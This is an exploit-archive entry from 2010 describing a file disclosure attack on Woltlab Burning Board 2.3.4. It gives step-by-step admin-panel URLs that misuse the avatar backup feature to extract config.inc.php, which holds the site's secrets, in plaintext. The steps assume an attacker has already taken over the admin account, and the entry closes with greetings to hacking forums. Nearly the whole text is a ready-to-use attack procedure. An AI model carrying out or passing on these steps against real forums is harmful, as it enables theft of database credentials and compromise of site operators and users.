[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Woltlab Burning Board 2.3.4 File Disclosure Vulnerability
# Published : 2010-11-12
# Author : sfx
# Previous Title : OneOrZero AIMS v2.6.0 Members Edition - Multiple Vulnerabilities
# Next Title : Joomla Component ccBoard 1.2-RC Multiple Vulnerabilities
# Exploit Title: Woltlab Burning Board 2.3.4 File Disclosure Vulnerability
# Date: 2010-11-12
# Author: SFX
# Version: 2.3.4
# CVE : N/A
After you've used the Exploit to get the admin account:
goto: http://lolcathost/wbb/acp/avatar.php?action=readfolder
import: acp/lib
download a backup: http://lolcathost/wbb/acp/avatar.php?action=backup
goto: http://lolcathost/wbb/acp/avatar.php?action=view
search for: config.inc.php
after you know the name (for example avatar-17.php), goto the zip archive
and open avatar-17.php
that's the config.inc.php in plaintext
tested under 2.3.4, maybe other versions work too
Greetz to:
free-hack.com, back2hack.cc, hackerking, Omegavirus, BlackBerry, fred777,
Red Tiger, Samsa